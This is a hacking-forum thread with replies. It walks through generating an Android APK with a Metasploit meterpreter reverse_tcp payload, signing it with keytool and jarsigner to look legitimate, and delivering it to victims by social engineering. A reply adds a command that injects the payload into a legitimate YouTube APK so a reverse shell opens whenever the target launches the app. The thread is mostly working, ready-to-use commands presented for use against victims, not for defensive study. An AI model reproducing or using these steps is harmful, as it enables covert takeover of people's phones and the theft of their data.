Getting Shell on Android and signing the APK File

As @pry0cc insisted that I create a post on how I manually signed a apk file in my post. As requested, here it is. Although please see this link here which is the reference that I used for my so called 1337 hax. Before I begin, what you’ll need is:

  • Metasploit
  • Msfvenom
  • Payload
  • keytool
  • jarsigner
  • A brain (please)

#Generating apk file

The first step is of course generating the apk file with meterpreter embedded in the file, of course any payload is usable, but I used the payload; android/meterpreter/reverse_tcp with lport 8080 and my external IP address. The command I used was:
msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=8080 > z.apk

Simple enough?

Of course you could try to just social engineer the apk file as it is, but I found that if you sign the apk file it is more “realistic”, but of course it is your choice.

#Signing apk file

There are two tools you’ll need, Keytool and Jarsigner. The first step is generating the keystore. When I did this, I didn’t change much for the command used. Why? It was late and I really didn’t care that much.

Anyways, the command used was:
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

the command is pretty self explanatory.

Now it is time to sign the apk file using this command:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname

Again, modify the flags as need be.

Of course, you could just verify the apk file with this command:
jarsigner -verify -verbose -certs APPNAME.apk

but I took the risk without checking the apk file because I’m a 1337 haxor.

And that’s it.

#Conclusion

Of course without having a victim it isn’t fun doing all this sooo hard work. I gotta admit, this is lazy and a skid move, but when it comes to SE, it works almost all the time if you do it right. I do not recommend you to use meterpreter unless you are trolling like I do and this will not work on those that are intelligent enough. I recommend your very own coded reverse shell above all else like these tut that @0x00pf wrote which helped me out a lot to learn about reverse shells. Thank you!

Anyways, I think that basically wraps everything up at least for now and I hope this does clear up some confusion and some doubts.

Cheers!

7 Likes

Soo… say that this attack is used… it doesn’t seem like you’re covering your tracks…

2 Likes

I understand that but that’s not the point here. My point is experimentation that I found which for some reason works, like a lot. I guess it is up for perspective and this is a very very very very skiddish move. That I understand which is why most should code their own reverse shell instead of meterpreter.

Nice! This could be really helpful to a lot of people. I would, however, recommend changing the title, it is super vague, perhaps “Getting a Shell on Android and Signing the APK”?

2 Likes

I recently have been playing around with Msfvenom and found that you can actually inject a payload inside an already legitimate .APK file. You can do this by downloading the app using a third party site, lets say we downloaded Youtube’s app or something. Say you wanted to set up a reverse TCP shell using Youtube.

msfvenom -x youtube.apk -p android/meterpreter/reverse_tcp LHOST=[YourIP] LPORT=[port of choice] -o [custom name for .APK file, something like youtubeV12.13.APK or something]

It should decompile the app, inject the payload, change the permissions and then load out the file with the name you selected.
It should execute every time the target loads the app.

This is just for fun by the way, and I hope this doesn’t bring any, eh hem…unwanted attention…

5 Likes

This topic was automatically closed after 30 days. New replies are no longer allowed.